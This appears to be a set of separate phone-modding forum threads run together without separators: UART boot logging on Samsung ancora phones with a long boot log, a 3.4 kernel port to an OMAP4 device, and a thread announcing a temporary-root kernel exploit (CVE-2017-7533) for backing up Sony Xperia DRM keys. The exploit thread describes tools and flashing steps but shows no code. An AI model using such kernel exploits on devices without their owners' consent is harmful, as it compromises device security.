As some of us here know, there are 3 ancora devices that are 100% known: The SGW, the Exhibit 2 and the Rugby Smart. For the last few weeks, I've been trying to establish a UART connection to the Rugby, being met with little to no success. (For those watching on G+, you've been privie to the information).
I know this is possible, since my TWRP image (using an arco68 based 2.6.35.14) for the Rugby can echo a kmsg to a serial monitor, but I haven't got 3.0.68 to do the same. So I'm calling in a global effort to get this cracked in the 3.0 kernel, that way we can deeper debug things.
What say the SGW and Exhibit 2 guys and gals?
Motorhead1991 said:
As some of us here know, there are 3 ancora devices that are 100% known: The SGW, the Exhibit 2 and the Rugby Smart. For the last few weeks, I've been trying to establish a UART connection to the Rugby, being met with little to no success. (For those watching on G+, you've been privie to the information).
I know this is possible, since my TWRP image (using an arco68 based 2.6.35.14) for the Rugby can echo a kmsg to a serial monitor, but I haven't got 3.0.68 to do the same. So I'm calling in a global effort to get this cracked in the 3.0 kernel, that way we can deeper debug things.
What say the SGW and Exhibit 2 guys and gals?
Click to expand...
Click to collapse
are you really trying to "UART", because you have adb, it also works when the phone is turned off.
for a really uart, we need a module, that enables a uart and make android a host.
adb kicks in too late for what I need, therefore I need to see what the SBL is doing with the kernel ant whatnot via UART.
Motorhead1991 said:
adb kicks in too late for what I need, therefore I need to see what the SBL is doing with the kernel ant whatnot via UART.
Click to expand...
Click to collapse
maybe you need some hardware mods, because you need to be listen before android starts, and the bootloader dont have specific code for that(i think).
unless you could mod you bootloader, try a jtag cable.
zezadas said:
maybe you need some hardware mods, because you need to be listen before android starts, and the bootloader dont have specific code for that(i think).
unless you could mod you bootloader, try a jtag cable.
Click to expand...
Click to collapse
As said in the OP, it works on 2.6.35.14 in recovery mode, just not 3.0.68 running the system. I don't even need the SBL log, as a kmsg would suffice.
What is UART?
Hi guys, What is UART?
I have google it already for the meaning,but i cant seem to understand its purpose or benefits on our device..
PS. Please no negative Feedback, i'm just asking!!
[iop]wah said:
Hi guys, What is UART?
I have google it already for the meaning,but i cant seem to understand its purpose or benefits on our device..
PS. Please no negative Feedback, i'm just asking!!
Click to expand...
Click to collapse
Using a UART connection on the ancora family (or any device) will help with kernel and filesystem debugging on boot, before adbd is even loaded, much less awake.
BTW, what you want to do with uart, beside log the bootloader?
AW: Establishing a UART connection to the Ancora
zezadas said:
BTW, what you want to do with uart, beside log the bootloader?
Click to expand...
Click to collapse
Obviously debugging.
Sent from my GT-I9001 using xda app-developers app
zezadas said:
BTW, what you want to do with uart, beside log the bootloader?
Click to expand...
Click to collapse
What XeLLaR* said... The Rugby 3.0 kernel is stuck without a camera because I have no idea what's killing the boot sequence. Initializing the cameras kills boot and it hangs on the second splash (ARIESVE.rle). I saw this with the a2220 chip also, which isn't something you guys have worked with (As far as I know).
Humm. Maybe you can post whay you have reached until now. Maybe we can help.
Also is always a interesting thread for me.
Sent from my GT-I8150 using xda app-developers app
Motorhead1991 said:
What XeLLaR* said... The Rugby 3.0 kernel is stuck without a camera because I have no idea what's killing the boot sequence. Initializing the cameras kills boot and it hangs on the second splash (ARIESVE.rle). I saw this with the a2220 chip also, which isn't something you guys have worked with (As far as I know).
Click to expand...
Click to collapse
I don't know if it helps or not, but Jocala (he started working on cm9 for ancora_tmo) used to use the a2220: https://github.com/Jocala/kernel.ancora_tmo.ics/blob/master/include/linux/a2220.h
However when it got official support from arco, it disappeared: https://github.com/arco/samsung-kernel-msm7x30/commit/4669dbff4ad08a084b11eabe350b3b6adb2f317e
any news about this project?
zezadas said:
any news about this project?
Click to expand...
Click to collapse
Not anything new I'm afraid... I'm still trying to figure it out however.
about the uart, can you already log bootloader?
zezadas said:
about the uart, can you already log bootloader?
Click to expand...
Click to collapse
I haven't got a bootloader response yet, just a kmsg, and only on 2.6.
1 year later...
Any progress?
On I9001 I can log something via UART cable... if I hold:
Code:
Volume -
and
Power on
http://forum.xda-developers.com/showpost.php?p=52944982&postcount=29
Some problems, because different speed... not 100 % managed yet...
But need also solution for I8150 Logging...
Thanx in advance.
Best Regards
bump...
I have now I8150 in my hands...
If I hold Volume - then I can see something...
Maybe wrong speed or some wrong settings... but something is send...
Maybe someone knows solution?
Thanx in advance.
Best Regards
adfree said:
bump...
I have now I8150 in my hands...
If I hold Volume - then I can see something...
Maybe wrong speed or some wrong settings... but something is send...
Maybe someone knows solution?
Thanx in advance.
Best Regards
Click to expand...
Click to collapse
Hello adfree
Good to know you have a i8150 from this moment :good:
İ couldnt understand good your problem but İf you want to enter into download mode : hold volume - and power on keys
Also i think we must revive this thread because seems mr.Blefish(who is maintaining ideos x5) ported lk bootloader into ideos x5 (so msm7x30/8x55)
Our devices(ancora and ariesve) are in same family with ideos x5 (msm7x30/8x55)
Here is the initial work on lk bootloader for msm7x30/8x55 devices:
https://github.com/Blefish/android_bootable_bootloader_lk/compare/973308d69a...7d422c985a
İf you are interested in lets start to PMing
Regards
http://forum.xda-developers.com/showpost.php?p=52944982&postcount=29
My goal is to see something like this with I8150...
Code:
AST_POWERON
[1810] 0' Partition Information
[1810] dstatus = 0
[1810] dtype = 12
[1810] dfirstsec = 1
[1810] dsize = 212991
[1810] name = modem
size=5[1810] *********************************************************************
[1810] 1' Partition Information
[1810] dstatus = 128
[1810] dtype = 77
[1810] dfirstsec = 212992
[1810] dsize = 1000
[1810] name = dbl
size=3[1810] *********************************************************************
[1810] 2' Partition Information
[1810] dstatus = 0
[1810] dtype = 70
[1810] dfirstsec = 213992
[1810] dsize = 7192
[1810] name = osbl
size=4[1820] *********************************************************************
[1820] 3' Partition Information
[1820] dstatus = 0
[1820] dtype = 5
[1820] dfirstsec = 221184
[1820] dsize = 30883840
[1820] name =
size=0[1820] *********************************************************************
[1820] 4' Partition Information
[1820] dstatus = 0
[1830] dtype = 71
[1830] dfirstsec = 229376
[1830] dsize = 10240
[1830] name = emmcboot
size=8[1830] *********************************************************************
[1830] 5' Partition Information
[1830] dstatus = 0
[1830] dtype = 73
[1830] dfirstsec = 245760
[1830] dsize = 40000
[1830] name = amss
size=4[1830] *********************************************************************
[1840] 6' Partition Information
[1840] dstatus = 0
[1840] dtype = 88
[1840] dfirstsec = 286720
[1840] dsize = 6144
[1840] name =
size=0[1840] *********************************************************************
[1840] 7' Partition Information
[1840] dstatus = 0
[1840] dtype = 72
[1840] dfirstsec = 294912
[1850] dsize = 10240
[1850] name = boot
size=4[1850] *********************************************************************
[1850] 8' Partition Information
[1850] dstatus = 0
[1850] dtype = 80
[1850] dfirstsec = 311296
[1850] dsize = 14000
[1850] name = adsp
size=4[1850] *********************************************************************
[1860] 9' Partition Information
[1860] dstatus = 0
[1860] dtype = 74
[1860] dfirstsec = 327680
[1860] dsize = 6144
[1860] name = modem_st1
size=9[1860] *********************************************************************
[1860] 10' Partition Information
[1860] dstatus = 0
[1860] dtype = 75
[1860] dfirstsec = 335872
[1870] dsize = 6144
[1870] name = modem_st2
size=9[1870] *********************************************************************
[1870] 11' Partition Information
[1870] dstatus = 0
[1870] dtype = 144
[1870] dfirstsec = 344064
[1870] dsize = 16384
[1870] name = persist
size=7[1870] *********************************************************************
[1880] 12' Partition Information
[1880] dstatus = 0
[1880] dtype = 145
[1880] dfirstsec = 360448
[1880] dsize = 15360
[1880] name = recovery
size=8[1880] *********************************************************************
[1880] 13' Partition Information
[1880] dstatus = 0
[1880] dtype = 146
[1880] dfirstsec = 376832
[1880] dsize = 10240
[1890] name = parameter
size=9[1890] *********************************************************************
[1890] 14' Partition Information
[1890] dstatus = 0
[1890] dtype = 147
[1890] dfirstsec = 393216
[1890] dsize = 1064960
[1890] name = system
size=6[1890] *********************************************************************
[1900] 15' Partition Information
[1900] dstatus = 0
[1900] dtype = 148
[1900] dfirstsec = 1458176
[1900] dsize = 204800
[1900] name = cache
size=5[1900] *********************************************************************
[1900] 16' Partition Information
[1900] dstatus = 0
[1900] dtype = 149
[1900] dfirstsec = 1662976
[1900] dsize = 2826240
[1910] name = userdata
size=8[1910] *********************************************************************
[1910] 17' Partition Information
[1910] dstatus = 0
[1910] dtype = 150
[1910] dfirstsec = 4489216
[1910] dsize = 409600
[1910] name = preload
size=7[1910] *********************************************************************
[1910] 18' Partition Information
[1920] dstatus = 0
[1920] dtype = 151
[1920] dfirstsec = 4898816
[1920] dsize = 1000
[1920] name = dbl_backup
size=10[1920] *********************************************************************
[1920] 19' Partition Information
[1920] dstatus = 0
[1920] dtype = 152
[1920] dfirstsec = 4907008
[1920] dsize = 7192
[1930] name = osbl_backup
size=11[1930] *********************************************************************
[1930] 20' Partition Information
[1930] dstatus = 0
[1930] dtype = 153
[1930] dfirstsec = 4915200
[1930] dsize = 10240
[1930] name = emmcboot_backup
size=15[1930] *********************************************************************
[1940] 21' Partition Information
[1940] dstatus = 0
[1940] dtype = 154
[1940] dfirstsec = 4931584
[1940] dsize = 40000
[1940] name = amss_backup
size=11[1940] *********************************************************************
[1940] 22' Partition Information
[1940] dstatus = 0
[1940] dtype = 155
[1940] dfirstsec = 4972544
[1940] dsize = 10240
[1950] name = boot_backup
size=11[1950] *********************************************************************
[1950] 23' Partition Information
[1950] dstatus = 0
[1950] dtype = 156
[1950] dfirstsec = 4988928
[1950] dsize = 14000
[1950] name = adsp_backup
size=11[1950] *********************************************************************
[1960] 24' Partition Information
[1960] dstatus = 0
[1960] dtype = 157
[1960] dfirstsec = 5005312
[1960] dsize = 10240
[1960] name = recovery_backup
size=15[1960] *********************************************************************
[1960] 25' Partition Information
[1960] dstatus = 0
[1960] dtype = 158
[1960] dfirstsec = 5021696
[1970] dsize = 10240
[1970] name =
size=0[1970] *********************************************************************
[1970] 26' Partition Information
[1970] dstatus = 0
[1970] dtype = 159
[1970] dfirstsec = 5038080
[1970] dsize = 10240
[1970] name =
size=0[1970] *********************************************************************
[1970] 27' Partition Information
[1980] dstatus = 0
[1980] dtype = 160
[1980] dfirstsec = 5054464
[1980] dsize = 26050560
[1980] name =
size=0[1980] *********************************************************************
[1980] fsa_i2c_init ENTRY !!!
[2010] fsa_i2c_write done.
[2060] fsa_i2c_read done.
[2060] GPIO i2c init SUCCESS i2c_data : 1e
[2060] KEY_VOLUMEDOWN detected! start with no console mode.
[2060] charger_attached ENTRY !!!
[2190] dtype =0x0 dtype2=0x8 !!!
[2190] charger_attached check [[ 0 ]] !!!
[2190] boot_chg check [[ 0 ]] !!!
magic_key_offset : 2551183360
Load boot partition.
[2380] cmdline = 'console=ttyMSM2,115200 androidboot.hardware=qcom androidboot.emmc=true hw=7'
[2380]
Booting Linux
[2380] cmdline: console=ttyMSM2,115200 androidboot.hardware=qcom androidboot.emmc=true hw=7
[2380] Backlight off
[ 0.000000] Initializing cgroup subsys cpu
[ 0.000000] Linux version 2.6.35.7-1207170 ([email protected]) (gcc version 4.4.0 (GCC) ) #1 PREEMPT Tue Oct 30 12:33:11 KST 2012
[ 0.000000] CPU: ARMv7 Processor [511f00f2] revision 2 (ARMv7), cr=10c53c7d
[ 0.000000] CPU: VIPT nonaliasing data cache, VIVT ASID tagged instruction cache
[ 0.000000] Machine: GT-I9001 Board
[ 0.000000] AriesVE H/W revision : 0x07
[ 0.000000] Memory policy: ECC disabled, Data cache writeback
[ 0.000000] allocating 10772480 bytes at c10a4000 (14a4000 physical) for fb
[ 0.000000] allocating 2097152 bytes at c1aea000 (1eea000 physical) for audio pmem arena
[ 0.000000] allocating 6291456 bytes at c1d00000 (2100000 physical) for kernel ebi1 pmem arena
[ 0.000000] allocating 31457280 bytes at c7600000 (7a00000 physical) for sf pmem arena
[ 0.000000] allocating 30212096 bytes at c9400000 (9800000 physical) for adsp pmem arena
[ 0.000000] allocating 5242880 bytes at cb0d0000 (b4d0000 physical) for hdmi pmem arena
[ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 112136
[ 0.000000] Kernel command line: console=ttyMSM2,115200 androidboot.hardware=qcom androidboot.emmc=true hw=7
[ 0.000000] PID hash table entries: 2048 (order: 1, 8192 bytes)
[ 0.000000] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes)
[ 0.000000] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes)
[ 0.000000] Memory: 58MB 134MB 256MB = 448MB total
[ 0.000000] Memory: 359932k/359932k available, 98820k reserved, 0K highmem
[ 0.000000] Virtual kernel memory layout:
[ 0.000000] vector : 0xffff0000 - 0xffff1000 ( 4 kB)
[ 0.000000] fixmap : 0xfff00000 - 0xfffe0000 ( 896 kB)
<5>[ 0.000000] DMA : 0xff000000 - 0xffe00000 ( 14 MB)
[ 0.000000] vmalloc : 0xe0800000 - 0xf0000000 ( 248 MB)
[ 0.000000] lowmem : 0xc0000000 - 0xe0000000 ( 512 MB)
[ 0.000000] modules : 0xbf000000 - 0xc0000000 ( 16 MB)
[ 0.000000] .init : 0xc0008000 - 0xc0036000 ( 184 kB)
[ 0.000000] .text : 0xc0036000 - 0xc072f000 (7140 kB)
[ 0.000000] .data : 0xc075e000 - 0xc07dcc20 ( 508 kB)
[ 0.000000] Hierarchical RCU implementation.
[ 0.000000] RCU-based detection of stalled CPUs is disabled.
[ 0.000000] Verbose stalled-CPUs detection is disabled.
[ 0.000000] NR_IRQS:566
[ 0.000000] sched_clock: 32 bits at 32kHz, resolution 30517ns, wraps every 131071999ms
[ 0.000000] Console: colour dummy device 80x30
[ 0.000122] Calibrating delay loop... 933.88 BogoMIPS (lpj=4669440)
[ 0.250244] pid_max: default: 32768 minimum: 301
[ 0.250366] Mount-cache hash table entries: 512
[ 0.250579] Initializing cgroup subsys cpuacct
[ 0.250579] Initializing cgroup subsys freezer
[ 0.250610] CPU: Testing write buffer coherency: ok
[ 0.270660] NET: Registered protocol family 16
[ 0.290863] socinfo_init: v4, id=74, ver=2.1, raw_id=1402, raw_ver=1402, hw_plat=2, hw_plat_ver=65536
[ 0.290863] Clock ownership
[ 0.290893] GLBL : 07d82110
[ 0.290893] APPS : 00000000 00000000 00000000
[ 0.290893] ROW : 00000000 00000000
[ 0.291046] acpu_clock_init()
[ 0.291687] ACPU running at 1401600 KHz
[ 0.293090] msm_wlan_gpio_init: msm_wlan_gpio_init
[ 0.293182] msm7x30_init_mmc: Initialized wlan GPIO's
[ 0.294128] snddev_poweramp_gpio_init
[ 0.294158] aux_pcm_gpio_init
[ 0.294281] fsa9480_gpio_init
[ 0.294433] [TSP] M1 TSP LDO init
[ 0.300292] yda165:register yamaha amp device
[ 0.300292] si4709:register fm radio si4709 device
[ 0.300292] i2c_register_board_info 12
[ 0.300292] i2c_register_board_info 8
[ 0.300323] i2c_register_board_info 10
[ 0.300354] i2c_register_board_info 17
[ 0.300354] bt_power_init
[ 0.300354] bluetooth_gpio_init on system_rev:0
[ 0.300781] touch_keypad_gpio_init.
[ 0.300781] Boot Reason = 0x04
[ 0.300781] hw perfevents: enabled with ARMv7 Scorpion PMU driver, 5 counters available
[ 0.300903] Scorpion registered PMU device
[ 0.300964] pm8058_init: i2c_add_driver: rc = 0
[ 0.301330] pm8058_probe: PMIC revision: E3
[ 0.302734] pm8058_gpio_probe: gpiochip_add(): rc=0
[ 0.302917] pm8058_mpp_probe: gpiochip_add(): rc=0
[ 0.306365] bio: create slab <bio-0> at 0
[ 0.306610] pmic8058_pwm_probe: OK
[ 0.306854] SCSI subsystem initialized
[ 0.307006] usbcore: registered new interface driver usbfs
[ 0.307037] usbcore: registered new interface driver hub
[ 0.307128] usbcore: registered new device driver usb
[ 0.307281] i2c-gpio i2c-gpio.9: using pins 171 (SDA) and 170 (SCL)
[ 0.307342] i2c-gpio i2c-gpio.19: using pins 123 (SDA) and 122 (SCL)
[ 0.307403] i2c-gpio: probe of i2c-gpio.14 failed with error -16
[ 0.307464] i2c-gpio i2c-gpio.20: using pins 125 (SDA) and 124 (SCL)
[ 0.307556] i2c-gpio i2c-gpio.10: using pins 55 (SDA) and 89 (SCL)
[ 0.307617] i2c-gpio i2c-gpio.13: using pins 165 (SDA) and 164 (SCL)
[ 0.307708] i2c-gpio i2c-gpio.17: using pins 173 (SDA) and 172 (SCL)
[ 0.307800] i2c-gpio i2c-gpio.8: using pins 149 (SDA) and 148 (SCL)
[ 0.307861] i2c-gpio i2c-gpio.12: using pins 88 (SDA) and 86 (SCL)
[ 0.307952] i2c-gpio i2c-gpio.11: using pins 169 (SDA) and 168 (SCL)
[ 0.308013] msm_i2c_probe
[ 0.308074] msm_i2c_probe: clk_ctl 35d, 100000 Hz
[ 0.308349] msm_i2c_probe
[ 0.308410] msm_i2c_probe: clk_ctl 35d, 100000 Hz
[ 0.308807] Advanced Linux Sound Architecture Driver Version 1.0.23.
[ 0.360412] Bluetooth: Core ver 2.15
[ 0.360443] NET: Registered protocol family 31
[ 0.360473] Bluetooth: HCI device and connection manager initialized
[ 0.360473] Bluetooth: HCI socket layer initialized
[ 0.360534] Switching to clocksource gp_timer
[ 0.363250] NET: Registered protocol family 2
[ 0.380584] IP route cache hash table entries: 4096 (order: 2, 16384 bytes)
[ 0.460723] TCP established hash table entries: 16384 (order: 5, 131072 bytes)
[ 0.460906] TCP bind hash table entries: 16384 (order: 4, 65536 bytes)
[ 0.460998] TCP: Hash tables configured (established 16384 bind 16384)
[ 0.460998] TCP reno registered
[ 0.461029] UDP hash table entries: 256 (order: 0, 4096 bytes)
[ 0.461029] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
[ 0.461120] NET: Registered protocol family 1
[ 0.461273] RPC: Registered udp transport module.
[ 0.461273] RPC: Registered tcp transport module.
[ 0.461273] RPC: Registered tcp NFSv4.1 backchannel transport module.
[ 0.461395] Trying to unpack rootfs image as initramfs...
[ 0.488372] Freeing initrd memory: 652K
<6>[ 0.488494] PMU: registered new PMU device of type 0
[ 0.488891] sdio_al:SDIO-AL SW version 1.30
[ 0.489135] smd probe
[ 0.489166] smd_core_init()
[ 0.489196] smd_core_init() done
[ 0.489196] smd_alloc_loopback_channel: 'local_loopback' cid=100
[ 0.489349] get_nand_partitions: no flash partition table in shared memory
[ 0.489776] smd_alloc_channel() 'DS' cid=0
[ 0.489837] smd_alloc_channel() 'RPCCALL' cid=2
[ 0.489868] smd_alloc_channel() 'DATA1' cid=7
[ 0.489929] smd_alloc_channel() 'DATA2' cid=8
[ 0.489959] smd_alloc_channel() 'DATA3' cid=9
[ 0.490020] smd_alloc_channel() 'DATA4' cid=10
[ 0.490051] smd_alloc_channel() 'DATA5' cid=11
[ 0.490081] smd_alloc_channel() 'DATA6' cid=12
[ 0.490112] smd_alloc_channel() 'DATA7' cid=13
[ 0.490173] smd_alloc_channel() 'DATA8' cid=14
[ 0.490203] smd_alloc_channel() 'DATA9' cid=15
[ 0.490264] smd_alloc_channel() 'DATA11' cid=17
[ 0.490295] smd_alloc_channel() 'DATA12' cid=18
[ 0.490325] smd_alloc_channel() 'DATA13' cid=19
[ 0.490356] smd_alloc_channel() 'DATA14' cid=20
[ 0.490417] smd_alloc_channel() 'DAL00' cid=38
[ 0.490447] smd_alloc_channel() 'BRG_0' cid=39
[ 0.490509] smd_alloc_channel() 'DATA5_CNTL' cid=40
[ 0.490539] smd_alloc_channel() 'DATA6_CNTL' cid=41
[ 0.490600] smd_alloc_channel() 'DATA7_CNTL' cid=42
[ 0.490631] smd_alloc_channel() 'DATA8_CNTL' cid=43
[ 0.490692] smd_alloc_channel() 'DATA9_CNTL' cid=44
[ 0.490753] smd_alloc_channel() 'DATA12_CNTL' cid=45
[ 0.490783] smd_alloc_channel() 'DATA13_CNTL' cid=46
[ 0.490814] smd_alloc_channel() 'DATA14_CNTL' cid=47
[ 0.490875] smd_alloc_channel() 'DATA40' cid=48
[ 0.490905] smd_alloc_channel() 'DATA40_CNTL' cid=49
[ 0.492126] SMD Packet Port Driver Initialized.
[ 0.492156] Notify: smsm init
[ 0.492309] Notify: general
[ 0.492340] Notify: general
[ 0.492340] Notify: general
[ 0.492340] Notify: general
[ 0.492340] Notify: general
[ 0.492340] Notify: general
[ 0.492340] Notify: general
[ 0.492340] Notify: general
[ 0.492340] Notify: general
[ 0.492370] Notify: general
[ 0.492370] Notify: general
[ 0.492614] SMD: ch 2 0 -> 1
[ 0.492828] [afe.c:afe_init] AFE driver init
[ 0.492950] SMD: ch 2 1 -> 2
[ 0.493194] [audpp.c:audpp_probe] Number of decoder supported 5
[ 0.493225] [audpp.c:audpp_probe] Number of concurrency supported 7
[ 0.493225] [audpp.c:audpp_probe] module_name:AUDPLAY4TASK
[ 0.493225] [audpp.c:audpp_probe] queueid:17
<6>[ 0.493225] [audpp.c:audpp_probe] decid:4
[ 0.493255] [audpp.c:audpp_probe] nr_codec_support:1
[ 0.493255] [audpp.c:audpp_probe] module_name:AUDPLAY3TASK
[ 0.493255] [audpp.c:audpp_probe] queueid:16
[ 0.493255] [audpp.c:audpp_probe] decid:3
[ 0.493255] [audpp.c:audpp_probe] nr_codec_support:11
[ 0.493286] [audpp.c:audpp_probe] module_name:AUDPLAY2TASK
[ 0.493286] [audpp.c:audpp_probe] queueid:15
[ 0.493286] [audpp.c:audpp_probe] decid:2
[ 0.493286] [audpp.c:audpp_probe] nr_codec_support:11
[ 0.493286] [audpp.c:audpp_probe] module_name:AUDPLAY1TASK
[ 0.493286] [audpp.c:audpp_probe] queueid:14
[ 0.493316] [audpp.c:audpp_probe] decid:1
[ 0.493316] [audpp.c:audpp_probe] nr_codec_support:11
[ 0.493316] [audpp.c:audpp_probe] module_name:AUDPLAY0TASK
[ 0.493316] [audpp.c:audpp_probe] queueid:13
<6>[ 0.493316] [audpp.c:audpp_probe] decid:0
Example from I9001...
Now Question how to set right settings for I8150...
LK sounds interesting... because I am playing with GT-S8600 here:
http://forum.xda-developers.com/showthread.php?t=2116846
Best Regards

[Kernel] Has anyone got 3.4 kernel working? Kernel hackes are welcome.

I'm trying to get "soho" kernel (from 4..5.5) update to work on the device. With a bunch of fixes I compiled android_jem_defconfig, but as far as I got is
Code:
Uncompressing Linux... done, booting the kernel.
<6>Booting Linux on physical CPU 0
<6>Initializing cgroup subsys cpu
<5>Linux version 3.4.83-g237457e-dirty ([email protected]) (gcc version 4.6.x-google 20120106 (prerelease) (GCC) ) #17 SMP PREEMPT Sun Dec 20 16:15:48 EET 2015
CPU: ARMv7 Processor [412fc09a] revision 10 (ARMv7), cr=10c5387d
CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
Machine: OMAP4 JEM board
[ 0.000000] Booting Linux on physical CPU 0
[ 0.000000] Initializing cgroup subsys cpu
[ 0.000000] Linux version 3.4.83-g237457e-dirty ([email protected]) (gcc version 4.6.x-google 20120106 (prerelease) (GCC) ) #17 SMP PREEMPT Sun Dec 20 16:15:48 EET 2015
[ 0.000000] CPU: ARMv7 Processor [412fc09a] revision 10 (ARMv7), cr=10c5387d
[ 0.000000] CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
[ 0.000000] Machine: OMAP4 JEM board
<6>bootconsole [earlycon0] enabled
[ 0.000000] bootconsole [earlycon0] enabled
<6>Initialized persistent memory from a0000000-a01fffff
[ 0.000000] Initialized persistent memory from a0000000-a01fffff
<6>android_display: setting lcd resolution to 1920*1200, bpp=4
[ 0.000000] android_display: setting lcd resolution to 1920*1200, bpp=4
<6>android_display: tiler1d 50331648
[ 0.000000] android_display: tiler1d 50331648
<6>android_display: setting vram to 33554432
[ 0.000000] android_display: setting vram to 33554432
<3>Cannot detect omap type!
[ 0.000000] Cannot detect omap type!
<6>Reserving 33554432 bytes SDRAM for VRAM
[ 0.000000] Reserving 33554432 bytes SDRAM for VRAM
<6>cma: CMA: reserved 16 MiB at ab800000
[ 0.000000] cma: CMA: reserved 16 MiB at ab800000
Memory policy: ECC disabled, Data cache writealloc
[ 0.000000] Memory policy: ECC disabled, Data cache writealloc
Then it hangs. For some reason it fails to detect omap4470es1.0. I'm not an advanced kernel hacker so I seek for suggestions in what direction to move to research the problem. I've also tried "bowser" and "soho" configs, still hangs at the same point. Could it be somehow related with the toolchain version? Should I try another one? Mainline 4.3.3 kernel with dts for pandaboard-es built with gcc 5.2 proceed's to boot much further, but I suppose it'll take too much time to get mainline kernel fully functional on the device, if it is even possible (because of blobs, firmwares etc.).
BTW, it may help if someone post "dmesg" output of succesfull boot of "soho" with stock kernel.
Nope not toolchain. GCC 5.2 result is still the same.
Well, it was quite trivial, I traced that it hangs while mapping lowmem. I have no idea why, but changing `vmalloc` to 496M resolves the issue.
Still need to find out why LCD panel does not work, and we'll have a fully functional 3.4 kernel!
Remember kid's, kernel and modules built with significantly different toolchains may be incompatible!
Have it working now. Fire OS 4.5.5 boots up .
Now I have to get touch in put working.
UPD: adding "idc" file for touchscreen and setting SELinux to "permissive" helped, still needs calibration, Woohoo working FireOS 4.5.5
Any progress on porting Fire OS after a semi-working touchscreen?

[XZ1c/XZ1/XZp] temp root exploit to backup drm keys implemented

Tools to backup TA partition (drm keys) of Xperia XZ1 Compact
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
by j4nn
https://j4nn.github.io/​
As everyone knows, bootloader unlock via code from sony removes drm keys. That disables certain functions, the most critical one being the camera (outputting only solid green pictures in case of oreo fw).
I've implemented tools that allow to backup the whole TA partition, which contains device master key needed to access sony drm keys and restore the TA after bootloader unlock in order to make the camera (among other things) working again on any sony stock firmware.
In order to be able to use the tools, you need to flash one of the supported firmwares (or be lucky to have the phone already running it).
In case you need to downgrade, please check this thread first.
Anybody who is about to unlock your phone, could you please do so with additional test included?
See post#500 and post#502 for more details.
Additional details in post#515, post#516, post#517 and post#527.
Instructions for the test that I kindly ask anybody who is about to unlock to do are described in the post#520 -- tested already.
Thank you.
ABOUT THE TOOLS
renosploit - rename/notify exploit to get kernelspace read/write, uses multiple vulnerabilities to overcome kaslr, pxn and pan mitigations of android oreo
renotrap - helper application (rename/notify temp root app)
renoshell - get temp root shell by use of kernel space read/write primitives provided by renosploit (sources available here)
renoroot - a shell script to be started from adb, it starts the above tools to get temp root shell
A preview video of the tools in action can be downloaded here: renoroot-preview.zip or watched online here.
As an alternative to renoroot you may use 'bindershell' to get a temp root shell for TA backup - it is available here /added on 2020-02-08/
SUPPORTED TARGETS
(with downloadable firmware links)
Sony Xperia XZ1 Compact (G8441)
47.1.A.2.324_CE1 (initial tested by @tramtrist, this release tested by @tanapoom1234 post#212)
47.1.A.8.49_CE1 (tested by @notaz post#224 and @orsonmmz post#232)
Sony Xperia XZ1 (G8341/G8343)
47.1.A.2.324_CE1 (tested by @HandyMenny post#228)
Sony Xperia XZ1 Dual (G8342)
47.1.A.2.281_CE1 (tested by @Vildanoff post#230)
Sony Xperia XZ1 (SOV36) /added on 2019-08-22/
this Japan version can be flashed with fw for G8431 making it exploitable as standard XZ1 (the possibility to use G8431 fw is confirmed here and also here)
/this confirms there might be a possibility of TA backup for few yoshino platform phone models that are possible to flash with one of the above firmwares (and boot ok even though designed for other phone variant)/
Sony Xperia XZ Premium (G8141)
47.1.A.3.254_CE1 (tested by @DocLM post#227, by @LinFan post#242 and by @steso90 xzp forum post#45)
Sony Xperia XZ Premium Dual (G8142)
47.1.A.3.254_RU (tested by @greatpatel007 xzp forum post#31 and #39)
Sony Xperia XZ Premium (G8188) /added on 2019-04-24/
this Japan version can be flashed with fw for G8141 making it exploitable as standard XZp (tested by zatsune as documented here)
/this confirms there might be a possibility of TA backup for few yoshino platform phone models that are possible to flash with one of the above firmwares (and boot ok even though designed for other phone variant)/
An advice: before flashing anything, enable 'OEM Unlocking' in android developer menu and if flashing a fw for different phone model, skip flashing bootloader (i.e. remove boot/ subdirectory completely before using newflasher). /added on 2019-08-27/
Please note: the temp root exploit (all renoroot tools) are designed only for the above firmware versions (binary kernels builds in them) - there is no chance it would work on other phones or other kernel builds - do not try it, it would not work.
Concerning portability to other targets, the exploit itself needs several vulnerabilities not fixed in a kernel, the primary one is CVE-2017-7533 (race between inotify and rename).
This was patched by google with 2017-12-05 security patch level. That means unless you can flash a firmware with older security patch level, it would not make sense to try to adapt the exploit for a new target (like it is a case with XZ2 Compact device for example).
USING THE TOOLS
Please follow the steps bellow for a official and up to date guide. If something was not clear enough, you may also check post#382 from @munted for a pdf guide with screenshots possibly containing more details and windows specific hints.
backup everything you need from your phone
flash compatible firmware
Before flashing, you may take a screenshot of service menu -> service tests -> security possibly together with current sw version screen for reference and copy them from the phone to your PC.
You can use newflasher tool from @munjeni and use instructions there to flash the firmware.
The tool should skip dangerous .ta files automatically. You may consider removing Just remove the persist_X-FLASH-ALL-42E5.sin file, which is discussed here to avoid flashing it - as tested by @tanapoom1234, not flashing the persist partition allows to keep the Android Attest Key - check his post#212. /Added on 2019-04-06: The key is not part of TA obviously, it is present in the persist partition, so never flash persist even after TA backup./
/Added on 2019-04-09: When flashing a firmware, be sure to flash it's bootloader too (i.e. the whole 'boot' directory needs to be present with all files in it including the .ta there). You might skip appslog, diag, Qnovo and ssd./
In case of downgrade it is needed to flash userdata (and possibly also cache) otherwise you get a boot loop.
Just backup your stuff before downgrade as with downgrade comes a factory reset. In fact I would recommend to do a factory reset just before the downgrade in order to remove the binding to your google account. This way you can avoid going online after the downgrade if used without sim and skipping wifi configuration.
prepare your phone
When the phone boots up, try to avoid connecting to internet by selecting only wifi and not configuring any, skipping accounts setup for later.
This may not always be possible - if persist is not flashed, android insists on setup of google account online, also starting downloads for upgrade.
Cancel everything as soon as possible and disable wifi. You may be better not using a data enabled sim card - we try to avoid any updates.
Disable auto updates of both apps and system. Change the theme from animated backgroud to a static one.
